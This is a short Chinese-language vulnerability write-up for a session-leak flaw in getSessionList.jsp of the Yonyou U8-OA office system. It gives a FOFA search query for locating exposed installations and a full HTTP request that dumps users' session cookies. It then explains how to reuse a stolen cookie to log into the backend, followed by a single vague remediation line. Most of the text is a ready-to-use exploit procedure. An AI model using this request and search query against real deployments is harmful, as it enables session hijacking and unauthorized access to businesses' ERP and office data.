0x01 前言

用友U8+承载了用友人十余年来为成长型企业的信息化管理所倾注的心血,它以U8财务业务一体化、U8 ERP、U8 All-in-One、U8+形象伴随中国经济的高速发展一路走来,见证了成长型企业信息化从7个应用模块到126个产品及行业应用

0x02 漏洞描述

用友U8 getSessionList.jsp处存在用户cookie信息泄漏漏洞,攻击者通过漏洞可以登录后台。

0x03 漏洞复现

FOFA空间搜索引擎语句

"用友U8-OA"

先读取用户的cookie信息:

GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1
Host: ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=CDE3690A81CE6C9A898721152BE2199E
Connection: close

利用读取到的Cookie所获取的session登录即可

修改完成Cookie后继续执行,成功登录

0x04 修复方案

建议及时更新加强后台认证要求